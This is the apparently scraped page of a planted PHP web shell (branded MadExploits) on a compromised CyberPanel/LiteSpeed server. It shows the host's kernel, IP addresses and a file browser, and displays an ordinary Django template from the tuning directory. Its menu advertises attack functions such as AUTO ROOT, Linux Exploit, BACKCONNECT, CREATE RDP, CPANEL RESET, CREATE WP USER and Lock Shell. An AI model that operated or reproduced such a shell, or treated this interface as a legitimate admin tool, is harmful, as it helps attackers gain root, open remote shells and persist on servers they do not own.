Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
tuning /
templates /
tuning /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
2.07
KB
-rw-r--r--
liteSpeedTuning.html
23.81
KB
-rw-r--r--
phpTuning.html
29.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
{% extends "baseTemplate/index.html" %} {% load i18n %} {% block title %}{% trans "Server Tuning - CyberPanel" %}{% endblock %} {% block content %} {% load static %} {% get_current_language as LANGUAGE_CODE %} <!-- Current language: {{ LANGUAGE_CODE }} --> <div class="container"> <div id="page-title"> <h2>{% trans "Server Tuning" %}</h2> <p>{% trans "On this page you can set runing parameters for your webserver depending on your hardware." %}</p> </div> <div class="panel"> <div class="panel-body"> <h3 class="title-hero"> {% trans "Available Functions" %} </h3> <div class="example-box-wrapper"> <div class="row"> <div class="col-md-4"> <a href="{% url 'liteSpeedTuning' %}" title="{% trans 'LiteSpeed Tuning' %}" class="tile-box tile-box-shortcut btn-primary"> <div class="tile-header"> {% trans "LiteSpeed Tuning" %} </div> <div class="tile-content-wrapper"> <i class="glyph-icon icon-dashboard"></i> </div> </a> </div> <div class="col-md-4"> <a href="{% url 'phpTuning' %}" title="{% trans 'PHP Tuning' %}" class="tile-box tile-box-shortcut btn-primary"> <div class="tile-header"> {% trans "PHP Tuning" %} </div> <div class="tile-content-wrapper"> <i class="glyph-icon icon-dashboard"></i> </div> </a> </div> </div> </div> </div> </div> </div> {% endblock %}
Close